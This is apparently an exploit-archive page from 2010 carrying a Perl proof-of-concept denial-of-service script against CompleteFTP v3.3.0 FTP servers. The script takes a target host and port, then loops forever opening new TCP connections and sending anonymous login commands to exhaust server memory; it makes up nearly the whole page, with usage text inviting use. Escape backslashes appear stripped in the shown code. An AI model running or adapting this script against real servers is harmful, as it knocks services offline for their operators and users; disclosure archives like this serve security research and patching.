CompleteFTP v3.3.0 - Remote Memory Consumption DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CompleteFTP v3.3.0 - Remote Memory Consumption DoS
# Published : 2010-04-08
# Author : Jonathan Salwan
# Previous Title : Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Next Title : Anyzip (.zip) v1.1 0day Poc (SEH)

#!/usr/bin/perl
#
# Title:   CompleteFTP v3.3.0 - Remote Memory Consumption DoS
# Author:  Jonathan Salwan <submit(!)shell-storm.org>
# Web:     http://www.shell-storm.org
# 
# ~60 sec for satured ~2Go RAM
#

use IO::Socket;

print "n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoSn";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>n";
 		print "[-] Exemple: file.pl 127.0.0.1 21nn";
 		exit;
		}

	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];
	$login 	= "USER anonymousrn";
	$pwd 	= "PASS anonymousrn";

	$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!n";

	print "Please Wait...n";

	while(){
		$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port");
		$socket->recv($answer,2048);
		$socket->send($login);
		$socket->send($pwd);
		}